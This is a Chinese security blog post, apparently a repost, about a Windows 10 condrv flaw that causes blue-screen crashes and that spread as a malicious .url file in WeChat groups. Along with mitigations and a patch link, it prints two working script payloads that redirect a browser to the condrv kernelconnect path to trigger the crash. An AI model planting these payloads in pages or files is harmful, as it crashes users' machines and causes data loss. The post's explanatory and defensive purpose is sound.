关于昨日的Windows微信蓝屏操作

admin 2021年5月10日01:26:35评论229 views字数 660阅读2分12秒阅读模式
关于昨日的Windows微信蓝屏操作点击上方蓝字关注我们


该漏洞是由于Windows 10中condrv设备不正确的错误检查导致异常,攻击者可利用该漏洞,通过在浏览器的地址栏中打开特定路径或构造恶意快捷方式进行钓鱼攻击,最终导致Windows 10蓝屏崩溃。


昨日,微信朋友圈和群里到处都是这个漏洞的玩意儿,有人在微信群里分享了一个包含蓝屏payload的test.url文件,微信开启文件自动下载功能的小伙伴就遭殃了,展现出如下的一幕。


受灾画面:


关于昨日的Windows微信蓝屏操作


关于昨日的Windows微信蓝屏操作


关于昨日的Windows微信蓝屏操作


其他利用方式XSS漏洞:


<script>document.location = '\\.\globalroot\device\condrv\kernelconnect';</script><script>document.location = 'file://./globalroot/device/condrv/kernelconnect';</script>


防护方法:
仅对windows10系统有效,其它系统不受影响,windows微信用户可关闭自动下载。


关于昨日的Windows微信蓝屏操作


亦或者使用cmd命令终端找到该文件,并删除。


关于昨日的Windows微信蓝屏操作


火绒官方提供的修复补丁,稳妥起见,用win10的老铁们打上吧。https://down5.huorong.cn/tools/HRCondrvVulFix.exe


关于昨日的Windows微信蓝屏操作

END



往期推荐

【渗透实例】寻找0-day漏洞入侵Apple

【渗透实例】Android渗透测试:WebView攻击

【漏洞分析】WordPress插件中的严重漏洞分析


关于昨日的Windows微信蓝屏操作


好文!必须在看


本文始发于微信公众号(SecTr安全团队):关于昨日的Windows微信蓝屏操作

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月10日01:26:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   关于昨日的Windows微信蓝屏操作https://cn-sec.com/archives/250432.html

发表评论

匿名网友 填写信息